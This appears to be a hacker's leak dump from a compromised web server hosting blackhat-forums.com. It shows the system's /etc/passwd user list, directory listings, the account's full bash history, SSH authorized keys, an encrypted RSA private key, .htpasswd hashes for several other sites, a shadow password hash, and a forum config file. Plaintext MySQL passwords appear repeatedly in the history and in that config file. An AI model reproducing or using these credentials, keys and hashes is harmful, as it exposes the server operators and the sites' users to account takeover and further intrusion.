sands:x:502:502::/home/sands:/usr/local/cpanel/bin/noshell
jon:x:511:511::/home/jon:/usr/local/cpanel/bin/jailshell
anderson:x:515:515::/home/anderson:/usr/local/cpanel/bin/noshell
darkwiza:x:518:518::/home/darkwiza:/usr/local/cpanel/bin/jailshell
woorpl:x:519:519::/home/woorpl:/usr/local/cpanel/bin/jailshell
ruchanie:x:520:520::/home/ruchanie:/usr/local/cpanel/bin/jailshell
theobama:x:523:523::/home/theobama:/usr/local/cpanel/bin/jailshell
filmy:x:524:524::/home/filmy:/usr/local/cpanel/bin/jailshell
jnitrous:x:525:525::/home/jnitrous:/usr/local/cpanel/bin/noshell
annasrec:x:526:526::/home/annasrec:/usr/local/cpanel/bin/noshell
alden:x:527:527::/home/alden:/usr/local/cpanel/bin/noshell
xomloani:x:528:528::/home/xomloani:/usr/local/cpanel/bin/jailshell
qontribu:x:533:533::/home/qontribu:/usr/local/cpanel/bin/noshell
bytesec:x:535:535::/home/bytesec:/usr/local/cpanel/bin/jailshell
thestate:x:536:536::/home/thestate:/usr/local/cpanel/bin/noshell
roofseal:x:538:538::/home/roofseal:/usr/local/cpanel/bin/noshell
noisecha:x:539:539::/home/noisecha:/usr/local/cpanel/bin/jailshell
coeparkg:x:540:540::/home/coeparkg:/usr/local/cpanel/bin/jailshell
shoutbox:x:541:541::/home/shoutbox:/usr/local/cpanel/bin/jailshell
avahi-autoipd:x:101:104:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
findserv:x:544:544::/home/findserv:/usr/local/cpanel/bin/noshell
theobam:x:546:546::/home/theobam:/usr/local/cpanel/bin/jailshell
johnmcca:x:551:551::/home/johnmcca:/usr/local/cpanel/bin/noshell
ronpaulf:x:552:552::/home/ronpaulf:/usr/local/cpanel/bin/noshell
mikehuck:x:553:553::/home/mikehuck:/usr/local/cpanel/bin/noshell
twogrow:x:555:555::/home/twogrow:/usr/local/cpanel/bin/noshell
thatsjus:x:556:556::/home/thatsjus:/usr/local/cpanel/bin/noshell
free:x:557:557::/home/free:/usr/local/cpanel/bin/jailshell
nnomypor:x:558:558::/home/nnomypor:/usr/local/cpanel/bin/noshell
nsprogr:x:559:559::/home/nsprogr:/usr/local/cpanel/bin/noshell
goranda:x:560:560::/home/goranda:/usr/local/cpanel/bin/noshell
bhserbia:x:561:561::/home/bhserbia:/usr/local/cpanel/bin/noshell
nacional:x:562:562::/home/nacional:/usr/local/cpanel/bin/noshell
racmusic:x:563:563::/home/racmusic:/usr/local/cpanel/bin/noshell
werecord:x:565:565::/home/werecord:/usr/local/cpanel/bin/noshell
asmdance:x:566:566::/home/asmdance:/usr/local/cpanel/bin/jailshell
prevent:x:567:567::/home/prevent:/usr/local/cpanel/bin/jailshell
unit3:x:568:568::/home/unit3:/usr/local/cpanel/bin/noshell
adamdixo:x:569:569::/home/adamdixo:/usr/local/cpanel/bin/noshell
obskurar:x:570:570::/home/obskurar:/usr/local/cpanel/bin/noshell
mp3wire:x:572:572::/home/mp3wire:/usr/local/cpanel/bin/noshell
coolpenn:x:574:574::/home/coolpenn:/usr/local/cpanel/bin/jailshell
albacrew:x:576:576::/home/albacrew:/usr/local/cpanel/bin/noshell
albahost:x:577:577::/home/albahost:/bin/bash
albaip:x:578:578::/home/albaip:/usr/local/cpanel/bin/noshell
albakafe:x:579:579::/home/albakafe:/usr/local/cpanel/bin/noshell
albalive:x:580:580::/home/albalive:/bin/bash
albanota:x:581:581::/home/albanota:/usr/local/cpanel/bin/noshell
albwarez:x:582:582::/home/albwarez:/usr/local/cpanel/bin/noshell
alprofil:x:583:583::/home/alprofil:/usr/local/cpanel/bin/noshell
arena:x:584:584::/home/arena:/usr/local/cpanel/bin/jailshell
bashkima:x:586:586::/home/bashkima:/usr/local/cpanel/bin/noshell
burma:x:587:587::/home/burma:/usr/local/cpanel/bin/noshell
centarza:x:588:588::/home/centarza:/usr/local/cpanel/bin/noshell
cutii:x:589:589::/home/cutii:/usr/local/cpanel/bin/noshell
dibra:x:591:591::/home/dibra:/usr/local/cpanel/bin/noshell
dizajn:x:592:592::/home/dizajn:/usr/local/cpanel/bin/noshell
drhajr:x:593:593::/home/drhajr:/usr/local/cpanel/bin/noshell
freshfru:x:594:594::/home/freshfru:/usr/local/cpanel/bin/noshell
islamv:x:596:596::/home/islamv:/usr/local/cpanel/bin/noshell
lali:x:597:597::/home/lali:/usr/local/cpanel/bin/noshell
llokumja:x:598:598::/home/llokumja:/usr/local/cpanel/bin/noshell
makpoker:x:599:599::/home/makpoker:/usr/local/cpanel/bin/noshell
malocom:x:600:600::/home/malocom:/usr/local/cpanel/bin/noshell
nasirc:x:601:601::/home/nasirc:/usr/local/cpanel/bin/noshell
nehat:x:602:602::/home/nehat:/bin/false
puthja:x:603:603::/home/puthja:/usr/local/cpanel/bin/noshell
radiohar:x:604:604::/home/radiohar:/usr/local/cpanel/bin/noshell
sejdiua:x:605:605::/home/sejdiua:/usr/local/cpanel/bin/noshell
shkupi:x:606:606::/home/shkupi:/usr/local/cpanel/bin/jailshell
shkupih:x:607:607::/home/shkupih:/usr/local/cpanel/bin/noshell
shkupim:x:608:608::/home/shkupim:/usr/local/cpanel/bin/noshell
shkupimu:x:609:609::/home/shkupimu:/usr/local/cpanel/bin/noshell
shkupit:x:610:610::/home/shkupit:/usr/local/cpanel/bin/noshell
udashuri:x:611:611::/home/udashuri:/usr/local/cpanel/bin/noshell
zbavitu:x:612:612::/home/zbavitu:/bin/bash
zbvinfo:x:614:614::/home/zbvinfo:/usr/local/cpanel/bin/noshell
zemrach:x:616:616::/home/zemrach:/usr/local/cpanel/bin/noshell
arienai:x:618:618::/home/arienai:/usr/local/cpanel/bin/noshell
zone:x:620:620::/home/zone:/bin/bash
cxcscans:x:621:621::/home/cxcscans:/usr/local/cpanel/bin/noshell
mangaemp:x:622:622::/home/mangaemp:/usr/local/cpanel/bin/noshell
servant:x:623:623::/home/servant:/usr/local/cpanel/bin/noshell
tube:x:624:624::/home/tube:/bin/bash
realwa:x:625:625::/home/realwa:/usr/local/cpanel/bin/noshell
thepcguy:x:626:626::/home/thepcguy:/usr/local/cpanel/bin/noshell
dashuri:x:631:631::/home/dashuri:/usr/local/cpanel/bin/jailshell
ready:x:632:632::/home/ready:/usr/local/cpanel/bin/noshell
munin:x:32288:32290::/home/munin:/bin/bash
jorde:x:634:634::/home/jorde:/usr/local/cpanel/bin/jailshell
satmonst:x:635:635::/home/satmonst:/usr/local/cpanel/bin/jailshell
earn:x:636:636::/home/earn:/usr/local/cpanel/bin/noshell
alhawzan:x:637:637::/home/alhawzan:/usr/local/cpanel/bin/noshell
topshiac:x:638:638::/home/topshiac:/usr/local/cpanel/bin/jailshell
islam:x:639:639::/home/islam:/usr/local/cpanel/bin/jailshell
party:x:641:641::/home/party:/usr/local/cpanel/bin/noshell
ballkoni:x:642:642::/home/ballkoni:/usr/local/cpanel/bin/noshell
zbvde:x:643:643::/home/zbvde:/usr/local/cpanel/bin/jailshell
srpskim:x:644:644::/home/srpskim:/usr/local/cpanel/bin/noshell

bhf@blackhat-forums.com [/home/bhf/]# uname -a 
Linux sl.secureservertech.com 2.6.29.4-grsec #2 SMP Fri Jun 19 02:21:47 CDT 2009 x86_64 
x86_64 x86_64 GNU/Linux

bhf@blackhat-forums.com [/home/bhf/]# ls

.bashrc
.bash_history
.bash_logout
.bash_profile
.contactemail
.cpaddons
.cpanel
.cpanel-logs
.cpcpan
.dns
.elinks
.fantasticodata
.ftpquota
.htpasswds
.lang
.lastlogin
.lesshst
.mc
.MirrorSearch
.my.cnf
.pearrc
.rvskin
.spamassassin
.spamassassinboxenable
.spamassassinenable
.sqmaildata
.ssh
.trash
.zshrc
access-logs
code
cpbackup-exclude.conf
etc
Haklog.txt
home
logs
mail
public_ftp
public_html
ssl
tmp
www

bhf@blackhat-forums.com [/home/bhf/]# cat .bash_history

exit
cd
ls
tar zxvf backup-6.30.2007_16-08-31_blackhat.tar.gz
ls
rm -rf public_html
cd backup-6.30.2007_16-08-31_blackhat/
ls
cd homedir/
ls
mv public_html/ /home/bhf
cd ..
cd
cd public_html
ls
cd phpBB2/
nano config.php
cd ..
cd forums/
nano config.php
ls
nano conf_global.php
cd
nano conf_global.php
cd pub*
cd
cd public_html/forums
nano conf_global.php
cd
ls
cd backup-6.30.2007_16-08-31_blackhat/
ls
cd mysql
ls
mysql -u bhf_forumus -p bhf_phpb < blackhat_phpb.sql
mysql -u bhf_forumus -p bhf_ipb < blackhat_ipb.sql
cd
chmod 755 public_html
cat /proc/cpuinfo
uname -r
w
who
cat /etc/motd
exit
ls
cd /
ls
uname -a
cd ~
ls
cd www
ls
cd phrack
ls
cd 64
ls
cd ..
cd ..
ls
cd Aelphaeis
ls
cd ..
ls
cd ..
ls
ls -al
cd www
ls -al
cd forums
ls -al
mkdir dskins
wget
clear
wget darkpred.googlepages.com/bluexm.zip
ls -al
mv *.zip dskins
unzip
clear
cd dskins
ls
unzip bluexm.zip
wget darkpred.googlepages.com/bluemotive3.png
clear
ls -al
mv ipb* ~
mv blue*.png ~
cd ~
ls -al
mv ipb* www/forums
ls -al
mv blue*.png www/forums
cd www/forums
ls -al
ls -al
ls -al
rm -rf dskins
rm -rf ipb*
ls -al
mkdir tmpskin
cd tmpskin
wget http://darkpred.googlepages.com/BluemotiveV2.zip
unzip *
wget http://darkpred.googlepages.com/bluemotive3.png
mv *.png ../forums
cd ..
ls
rm -rf forums
cd tmpskin
ls
ls -al
unzip *.zip
cd Blue*
ls -al
mv ipb* ~/www/forums
clear
exit
w
top
clear
ls
cd www
ls
cd Downloads
ls
cd Misc
ls
exit
cd
ls
ls php
rm -rf php
rm -rf perl
ls .trash
cd public_html
mc
cat /etc/passwd
ls
exit
clear
ls
cd www
ls
nano index.htm
nano index.htm
mkdir img
mv nucl*.png ./img
ls
mv *.png ./img
mv *.gif ./img
mv *.jpg ./img
ls
rm -rf zone-h.PNG
rm -rf Ael*.PNG
ls
rm -rf zone*.bmp
ls
cd img
ls
cd ..
ls
wget darkpred.googlepages.com/index.htm
rm -rf index.htm
mv index.htm.1 index.htm
ls
ls -al
exit
ls
cd public_html
ls
nano .htaccess
nano .htaccess
cd ..
ls
cd .htpasswds
ls
cd publi*
ls
nano passwd
cd ..
cd ..
ls
cd tmp
ls
cd analog
ls
cd ..
cd ..
ls
ls
ls -al
cd /root
cd /
ls
cd tmp
ls
cd ~
ls
exit
mysqldump --opt -ubhf_winter -pdj2t84h9438hfqd2h4093hfoh493q -h localhost bhf_fo
rumipb > backup_fresh.sql
mysqldump --opt -ubhf_winter -pdj2t84h9438hfqd2h4093hfoh493q -h localhost bhf_fo
rumipb > backup_fresh.sql
mysqldump --opt -ubhf_winter -pdj2t84h9438hfqd2h4093hfoh493q -h localhost bhf_fo
rumipb > backup_fresh.sql

mysql -u bhf_winter -p dj2t84h9438hfqd2h4093hfoh493q -h localhost < backup_fresh
.sql
mysql -u bhf_winter -p dj2t84h9438hfqd2h4093hfoh493q bhf_ipb -h localhost < back
up_fresh.sql
mysql -ubhf_winter -pdj2t84h9438hfqd2h4093hfoh493q bhf_ipb -h localhost < backup
_fresh.sql
mysqldump --opt -ubhf_winter -pdj2t84h9438hfqd2h4093hfoh493q -h localhost bhf_ip
b > backup_forum.sql
mysql -ubhf_winter -pdj2t84h9438hfqd2h4093hfoh493q bhf_forumipb -h localhost < b
ackup_forum.sql
mysql -ubhf_winter -pdj2t84h9438hfqd2h4093hfoh493q bhf_forumipb -h localhost < b
ackup_forum.sql
exit
mysql -ubhf_winter -pdj2t84h9438hfqd2h4093hfoh493q bhf_forumipb -h localhost < /
public_html/bhf_ipb.sql
mysql -ubhf_winter -pdj2t84h9438hfqd2h4093hfoh493q bhf_forumipb -h localhost < p
ublic_html/bhf_ipb.sql
pwd
ls
cd public_html/
ls
cd forums
pwd
/home/bhf/public_html/forums
who
ls
mv * ~/public_html/
ls
cd ..
pwd
ls
ls
mv index.htm _index.htm
ls
vi init.php
ls
vi conf_global.php 
ls
cd public_
cd public_html/
ls
pwd
cd devz
cd devzZ
ls
cd forum
ls
cd..
cd ..
touch idnex.html
ls
rm idnex.html 
touch index.html
cd forum
mv conf_global.php.dist conf_global.php
ls
chmod 777 *
rm -r install/
ls
ls -al
cd www
ls
nano crap.html
nano crap.htm
uname -a
ftp
clear
ping 420.no-ip.org
ping 420.no-ip.org
ping 420.no-ip.org
ping 420.no-ip.org
ping 420.no-ip.org
ping darkpred.no-ip.org
clear
ftp
ftp
clear
ls
ftp
clear
nano crap.htm
links
clear
lynx
ls
nano .htaccess
nano .htaccess
nano .htpasswds
cd .htpasswds
cd .htpasswd
nano .htpasswds
ls -al
nano .htaccess
cd ..
ls
cd .htpasswds
ls
cd pub*
ls
nano passwd
exit
logout
ls
cd .htpasswds
ls
cd pu*
ls
nano passwd
cd ..
cd ..
ls
cd www
nano .htaccess
clear
echo hello sysadmin, happy sysadmin day, a few days later
echo better late than never ;)
echo "better late than never ;)"
clear
ls
nano init.php
clear
logout
ls
cd public_html
ls
wget
clear
ls
rm -rf admin
rm -rf admin.php
rm -rf cache
rm -rf converge_local
ls
rm -rf install

rm -rf ips_kernel
rm -rf jscripts
rm -rf lofiversion
rm -rf modules
rm -rf resources
rm -rf retail
rm -rf skin_acp
rm -rf sources
rm -rf style_avatar
rm -rf style_captcha
rm -rf style_emoticons
rm -rf style_images
rm -rf upgrade
ls
unzip
clear
ls
rm -rf index.php
rm -rf init.php
clear
wget http://files-upload.com/files/569443/upload.zip
ls
unzip
unzip update.zip
ls
unzip upload.zip
ls
ls -al
rm -rf upload.zip
wget http://3.download-1.files-upload.com/50/2007/10/19/05-10/0/upload.zip
clear
lynx
clear
exit
clear
cd public_html
undelete
undel
ls
ls
unzip upload.zip
clear
exit
cd www
ls
rm -rf upload.zip
rm -rf upload
ls
clear
chmod cache 0777
chmod 0777 cache
chmod 0777 skin_cache
chmod 0777 style_images
ls
mkdir skin_cache
chmod 0777 skin_cache
rm -rf skin_cache
chmod 0777 cache/skin_cache
ls
exit
cd www
ls
cd ..
ls
cd www
chmod 0777 admin
exit
ls
man tar
mkdir test
touch test/lol.txt
tar cvvf test.tar /test
clear
ls
rm -rf test.tar
rm -rf test
clear
ls
clear
irssi
bitchx
clear
exit
ls
ls -la
nano .cpanel-logs 
cd public_html
ls -la
cd ..
cd public_ftp/
ls -la
cd incoming/
ls -la
cd ..
cd ..
ls
cd access-logs 
nano access-logs 
ls -la access-logs 
cd etc
ls
cd blackhat-forums.com/
ls
cd ../../
ls
ls ../
ls ../../
cd tmp
ls
cd ../
ls
cd public_html
ls -la
ls -la
cd public_html
ls -la
uname -a
exit
nano .bash_history
nano .bash_history
exit
w
ls -la
cd public_html
ls -la
grep -r .
grep 
grep -r shell .
grep -r shell .
grep -r c99 .
grep -r x2300 .
grep -r hacked .
cd /tmp
ls -la
ps -ef
ps -aux
ps aux
uanem -a
uname -a
uname -a
df
free
pwd
ls -l 7et
ls -l /etc
w
who
/usr/bin/who
ls -al
cd www/
ls -al
vi index_defaced.htm 
php -v
php phpinfo(); > phpinfo.html
php "phpinfo();" > phpinfo.html
vi phpinfo.php
vi phpinfo.php
cd ..
mkdir vm
cd vm
mkdir skel
mkdir kernel
cd kernel/
wget http://uml.nagafix.co.uk/uml/kernels/kernel32-2.6.28.1.bz2
tar -jxvf kernel32-2.6.28.1.bz2 
bunzip2 kernel32-2.6.28.1.bz2 
cd ..
cd skel/
wget http://uml.nagafix.co.uk/filesystems/CentOS-5/CentOS5-x86-root_fs.bz2
bunzip2 CentOS5-x86-root_fs.bz2 
di
id
cat /proc/sys/net/ipv4/ip_forward
echo 1 > /proc/sys/net/ipv4/ip_forward
ls -al
cd ..
cd kernel/
ls -al
chmod 755 kernel32-2.6.28.1 
./kernel32-2.6.28.1 
./kernel32-2.6.28.1 --help
pwd
./kernel32-2.6.28.1 text devfs=nomount mem=64M eth0=tuntap,,,192.168.0.2 ubd0=/h
ome/bhf/vm//skel/CentOS5-x86-root_fs
cd ..
cd ..
rm -rf vm/
cd www/
ls -al
mv newoldstuff/ ..
ls -l ..7
ls -l ../
ls -al
mv ..7 newoldstuff
mv newoldstuff ../
mv * ../newoldstuff/
ls -al
mv ../newoldstuff/cgi-bin/ .
mv ../newoldstuff/index.htm .
tar xvjpf board2_3_6.zip 
gunzip board2_3_6.zip 
unzip board2_3_6.zip 
mv board/upload/* .
ls -al
chmod -R 755 * 
ls -al
mv install/ ../
ls -al
vi index.
vi index.php 
vi conf_global.php 
vi conf_global.php 
cp -R ../newoldstuff/uploads/ .
ls -l ../newoldstuff/
chmod 711 favicon.ico init.php index.php admin.php 
ls -al
chmod 700 favicon.ico init.php index.php admin.php 
ls -al
chmod 711 favicon.ico init.php index.php admin.php 
ls -al
chmod 744 favicon.ico init.php index.php admin.php 
ls -al
chmod 644 favicon.ico init.php index.php admin.php 
ls -al
ls -l ../newoldstuff/
ls -l ../newoldstuff/interface/
ls -al
ls -al
mv ../install/ .
mv install/ ../
ls -l cgi-bin/
cat cgi-bin/.pr0s.pl 
mkdir ../code
mv cgi-bin/.pr0s.pl ../code/
ls -al
cd ..
ls -al
vi .bash_profile 
mv access-logs www/
mv logs/ www
cd www/
ls -al
cd ..
ls -al
mv www/logs/ .
ls -al
mv www/access-logs .
vi www/.htaccess 
vi newoldstuff/ghosty/.htaccess 
vi newoldstuff/ghosty/.htpasswd 
mv newoldstuff/ghosty/ www/
mv www/ghosty/ newoldstuff/
cd ..
ls -al
cd bhf/
ls- al
ls -al
ls -l cpmove.psql
ls -l cpmove.psql/psql/
rm -rf cpmove.psql
ls -l cpmove.psql.1218969837/
ls -l cpmove.psql.1218969837/psql/
rm -rf cpmove.psql.1218969837/
ls -l bi
ls -l bim
ls -l bin
rm -rf bin
ls -al
ls -l ssl
ls -a
ls -al
ls -l .MirrorSearch/
ls -l .mc/
ls -l .mozilla/
ls -l .mozilla/plugins/
ls -l .mozilla/extensions/
rm -rf .mozilla/
ps -ef
ls -al
ls -l .spamassassin
vi .my.cnf 
rm -rf biden.jpg Saakashvili_bush.jpg 
cd www
cd up
cd uploads/
ls -al
ls -al | grep php
ls -al | grep html
ls -al | grep pl
ls -al | grep cgi
ls -al | grep shtml
ls -al | grep phtml
ls -al | grep php3
ls -al | grep php4
ls -al | grep php5
ls -al | grep php6
ls -al
ls -al profile/
cat /proc/cpuinfo
uname -a
cd ..
cd ..
ls -al
vi .ssh/BlackHat
vi .ssh/BlackHat.pub 
vi .ssh/authorized_keys
vi .ssh/authorized_keys2
cat $HISTTIMEFORMAT
set HISTTIMEFORMAT='%h/%m - %H/%M/%S'
ls -al
cat .bash_history 
cat .bash_history 
exit
cat .bash_history 
vi .bashrc 
vi .bash_profile 
history
exit
#1237938198
history
#1237938204
echo $0
#1237938218
echo $HISTTIMEFORMAT
#1237938236
set HISTTIMEFORMAT='%h/%m - %H/%M/%S'
#1237938238
echo $HISTTIMEFORMAT
#1237938240
echo $0
#1237938250
set $HISTTIMEFORMAT='%h/%m - %H/%M/%S'
#1237938252
echo $HISTTIMEFORMAT
#1237938364
HISTTIMEFORMAT='%h/%m - %H/%M/%S'
#1237938366
echo $HISTTIMEFORMAT
#1237938378
vi .bash_profile 
#1237938385
exit
#1237938412
history
#1237938421
vi .bash_profile 
#1237938450
exit
#1237938469
history
#1237938581
date
#1237938590
vi .bash_profile 
#1237938639
exit
#1237938815
history
#1237938834
uname -a
#1237938852
cat /proc/cpuingo
#1237938856
cat /proc/cpuinfo
#1237938880
pwd
#1237938884
ls 
#1237938668
history
#1237938723
cat /etc/services 
#1237938728
netstat -l
#1237938731
netstat -al
#1237939759
w
#1237939775
cat /usr/bin/w
pwd
chmod -R 644 *.php
ls -l
ls -la
chmod 644 *.php
ls -al
ls -al ipb/
find -iname *.php -maxdepth 1 -type f -exec chmod 644 {} ;
find -iname *.php -maxdepth 1 -type f -exec chmod 644 {} ;
find -maxdepth 1 -iname *.php  -type f -exec chmod 644 {} ;
find *.php -maxdepth 1 -type f -exec chmod 644 {} ;
find *.php -maxdepth 1 -type f
find "*.php" -maxdepth 1 -type f
find "*.php" -maxdepth 1 -type f -print
find -iname "*.php" -maxdepth 1 -type f -print
find -iname "*.php" -type f -print
find -iname "*.php" -type f -exec chmod 644 {} ;
find -iname "*.php" -type f -exec chmod 644 ``{}'' ;
find -iname "*.php" -type f -exec chmod 644 {} ;\
find -iname "*.php" -type f -exec "chmod 644 {}" ;
man find
find -iname "*.php" -type f -exec chmod 644 '{}' \;
ls -al
ls -al ipb/
cd ..
cd ..
pwd
cd ..
find -iname "*.php" -type f -exec chmod 644 '{}' \;
exit
#1237985901
ls -al
#1237985902
cd newoldstuff
#1237985903
ls -al
#1237985922
mv affils/ ../www/
#1237985951
ls -l ../www/
#1237985960
mv images/ ../www/
#1237985976
chmod 777 ../www/uploads/
#1237985983
mv *.pdf ../www/
#1237986011
mv pics/ ../www/
#1237986020
ls -al
#1237986039
mv google7b9d7b49f4ea50cb.html  ../www
#1237986067
ls -l style_avatars/
#1237986075
ls -l style_captcha/
#1237986079
ls -l style_images/
#1237986087
ls -l style_images/bhfskin/
#1237986092
ls -al
#1237986118
ls -l ../www/images/
#1237986123
ls -l ../www/pics/
#1237986423
ls -al
#1237986444
ls -l ../www/style_images/
#1237986450
ls -l style_images/
#1237986479
mv style_images/bhfskin/ ../www/style_images/
#1237986488
ls -l ../www/style_images/bhfskin/
#1237986521
mv style_images/11_11_2_logo4.jpg ../www/style_images/
#1237986530
mv style_images/11_2_logo4.jpg ../www/style_images/
#1237986531
ls -al
#1237986549
ls -al
#1237986685
chmod -R 755 ../www/cache/
#1237986703
ls -l style_avatars/
#1237986751
ls -al
#1237986756
ls -l modules/
#1237986766
ls -l ips_kernel/
#1237986775
cd ../www/
#1237986776
ls -al
#1237986781
ls -l interface/
#1237986786
ls -l interface/board/
#1237986791
ls -l interface/board/modules/
#1237986794
ls -l interface/board/modules/ipb/
#1237986918
find -maxdepth 1 -type f -exec chmod 644 *.php \;
#1237986920
ls -al
#1237986926
ls -l interface/board/modules/ipb/
#1237986944
man find
#1237987063
cd nterface/board/modules/ipb/
#1237987067
cd interface/board/modules/ipb/
#1237987068
cd ..
#1237987076
chmod -R 644 *.php
#1237987085
chmod -R 644 `*.php` 
#1237987092
chmod -R 644 '*.php' 
#1237987100
chmod -R 644 ´*.php´ 
#1237987108
man find
#1237987185
find -maxdepth 1 -type f -exec chmod 644 {} *.php
#1237987213
find -maxdepth 1 -type f -exec chmod 644 {} ;\
#1237987228
man find
#1237987540
/usr/bash
#1237987543
/usr/s
#1237987547
/usr/sh
#1237987554
/bin/sh
#1237988467
cd ..
#1237988468
cd ..
#1237988469
cd ..
#1237988478
mv index.html index.old.html
#1237988982
vi init.php 

bhf@blackhat-forums.com [/home/bhf/.ssh]# ls
 
authorized_keys
authorized_keys2
BlackHat
BlackHat.pub

bhf@blackhat-forums.com [/home/bhf/.ssh]#cat authorized_keys authorized_keys2
 
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAkqLRPOUqschX8pZ+vKcHuzrr8rBBJ2vUm1wt0Pz0UwE0
k7i6JbuiHojbBzEnSbb/od8yNptlvglyPvSq+87a52M6jmya4WVUUgdyXsH7pB37wGUp9/ZTt6Iz1PQ4
CJecg2j9eaQWRFWj46t1XG1Pv3tAh3nEFlKj6nbjV0iwlauzqDZBjKNBul+dmpzB1yKe+5D07r+RaDsj
Bo1BmQnT/QP+YLIwEWgCsZIDJvgRnZbwSRVEFmvNmGu/YBoojcwx14C55ZRKtqrsc7ivOocuiWQ8XqhV
MxUigo7lMhqw2jnbUbLrCYx3uEfp/9EXu7Msys3u7uhS7cSPDEUhWNmchQ== bhf@cp.secureserver
tech.com
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAkqLRPOUqschX8pZ+vKcHuzrr8rBBJ2vUm1wt0Pz0UwE0
k7i6JbuiHojbBzEnSbb/od8yNptlvglyPvSq+87a52M6jmya4WVUUgdyXsH7pB37wGUp9/ZTt6Iz1PQ4
CJecg2j9eaQWRFWj46t1XG1Pv3tAh3nEFlKj6nbjV0iwlauzqDZBjKNBul+dmpzB1yKe+5D07r+RaDsj
Bo1BmQnT/QP+YLIwEWgCsZIDJvgRnZbwSRVEFmvNmGu/YBoojcwx14C55ZRKtqrsc7ivOocuiWQ8XqhV
MxUigo7lMhqw2jnbUbLrCYx3uEfp/9EXu7Msys3u7uhS7cSPDEUhWNmchQ== bhf@cp.secureserver
tech.com

bhf@blackhat-forums.com [/home/bhf/.ssh]# cat BlackHat BlackHat.pub

 
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,E3512229ABD62387

XbiBxmNbGMN0hx2XOEzeFz+oWzyJa2AyYgfQlPhopgIiOBbAAnQdRKoLkjBn9SZg
pE807J5g2O53Rl/px8EX5Nj9k88l1onUUkSmecVZSciyNZS8wc8pKdPQlmamrpph
65JUTjeSrh4Z7xsHwa68NgREudjIvF3bt9+SgpWose4+UB2+PralmDE9ZYK8C9Di
RcEFTsPt5pkh34cXlfUS46e39YbwYKvJBCxTitzjdk7BvEdHPFeX2pmKWF0CrLnl
oy9geqbA6V1NTb7CQwkNrhJPIgoKwHa+d0rMEv4frVpJ7eYM5wEjNPRwEwcdtoXF
uIXdjcnSteDVGoE8z9HIaTEJ1EjALHdnt9cqeXHlN/OqFGV85rJiApnq9q1Cy+LM
0cqsp3FQWdsLC3LH1jCzV7kvmskFMZsoBP5ghjkoQDFTGlqkJfH2CyWjy1KNeKIH
N+ZFJaxyYjlNgGx2jH07lHj6yzaZrNGn4hX+sZlxPgwFgngTdxIbDDYfYlQdBOog
mDtH0LGlhSGPQErMfIIvbDRv9axsBSP0nNBiY7XhESaChFVWkk7BFiQ2Sd0EOWbn
1ZEI3Rv2YpI0m62ttYAwEqNx0Cl7eXVUl3ImON//8dF/4+8utJUSqvUd/7DFr3eB
FJYobDjuG0dWKyE/DCxQ6MPoXPjY5b/huKVG63onHXnGoPjOcE2uzruI1j05hBBl
Rry/zIu8EjPmqt3mnLKinQqvai8q68IqgugpYbWcJAmEINrOEJMfHQNrFjjvYLh3
ODiSC8/6wh5Od6Y6mBZcTiqQhyZkwAvTrq6i7xLtq0hqO6ZZB+Z4RB1K2dZL8RWf
0i5hzj6bt8D6c79E7kELfqrA1/5XwpGxRRDWUD3V8wVQE/hv4ff5GQy8P8Lerl9n
HCoC2tDwe0qhz4BvCMXLblgTkJMoqV19psvPJFlGseC8/tb+iiHchok1Y9Hju1Z4
0bCwRMDnmSWlOLNBS+DUsPN4R/gUIo/oHdPxG+tZnKFUo4MiEX8IK/8kmS66g0zp
fz/A6qP6DtgcE06WKRUr52xGUChedkP3EgAIv4wmtyFw1tjxpagwvIGz2ABEtHtp
zxIer7s8Kg26Lv2IIG+BLZPVVLJwHtVvn1V2U3hm3kLlwplbOX2wNKfdviAw9juU
aeJeAiA3C1xgm1PrvxiD3kJIwtYc0H5imio2FpTu0vryaUn++B1L3RgA4kfXN9SV
UT2d12qyMc4qSS7CbeLdi0f0kop8NNCYbCPXQ3q1hX3oT2eXOizABRD5EtKrgXnt
ZMVAGVLw7Wmzp71bxz6GcO99bW4vBZMqYSCahEldeKJNTBSlSGYsA5je54V55kqC
IE58RmgIXBsCCyQGNFy0E8UOuPbCwspAUSzmLQUExXOGoPqGL04vYZQovaQz2R1+
Lcgn08BDbXJEomolDzU56S1Bd/Uu290gUKwvG0cwFRpfnZEnNZFx525izjWaPamg
9lUIpcSqSWbJW8/l888KsXZ6axn9ZqRpoSdeq79r2a72QWjHr8lgdUzfC2wkNcEm
muDwnpRowZYlamFtBE3Zz+mkfotb7tMEaMz4EYhOfnp+Y/X/IXTRgA==
-----END RSA PRIVATE KEY-----

ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAkqLRPOUqschX8pZ+vKcHuzrr8rBBJ2vUm1wt0Pz0UwE0
k7i6JbuiHojbBzEnSbb/od8yNptlvglyPvSq+87a52M6jmya4WVUUgdyXsH7pB37wGUp9/ZTt6Iz1PQ4
CJecg2j9eaQWRFWj46t1XG1Pv3tAh3nEFlKj6nbjV0iwlauzqDZBjKNBul+dmpzB1yKe+5D07r+RaDsj
Bo1BmQnT/QP+YLIwEWgCsZIDJvgRnZbwSRVEFmvNmGu/YBoojcwx14C55ZRKtqrsc7ivOocuiWQ8XqhV
MxUigo7lMhqw2jnbUbLrCYx3uEfp/9EXu7Msys3u7uhS7cSPDEUhWNmchQ== bhf@cp.secureserver
tech.com

bhf@blackhat-forums.com [/home/bhf/.htpasswds/public_html/morganti/infowars-aust
ralia.com]# cat passwd

infowars:_aZ2sSwqXfa0U

bhf@blackhat-forums.com [/home/bhf/.htpasswds/public_html/morganti/perthcitizens
fortruth.org]# cat passwd

truth:LEUnx.HF5kNmg

bhf@blackhat-forums.com [/home/bhf/.htpasswds/public_html/ptsec.net/octagonal]# 
cat passwd

pequenopalco:0NhnQW5j.DmQg

bhf@blackhat-forums.com [/home/bhf/etc/blackhat-forums.com]# cat passwd

admin:x:32030:32032::/home/bhf/mail/blackhat-forums.com/
admin:/usr/local/cpanel/bin/jailshell

bhf@blackhat-forums.com [/home/bhf/etc/blackhat-forums.com]# cat shadow

admin:$1$VesctqnB$tWjZ.3ojCbQofjolC4EYf.:14370::::::

bhf@blackhat-forums.com [/home/bhf/public_html]# cat conf_global.php

<?php
$INFO['sql_driver']			=	'mysql';
$INFO['sql_host']			=	'localhost';
$INFO['sql_database']			=	'bhf_forumipb';
$INFO['sql_user']			=	'bhf_logisti';
$INFO['sql_pass']			=	'{r#eIwQZ&!VA';
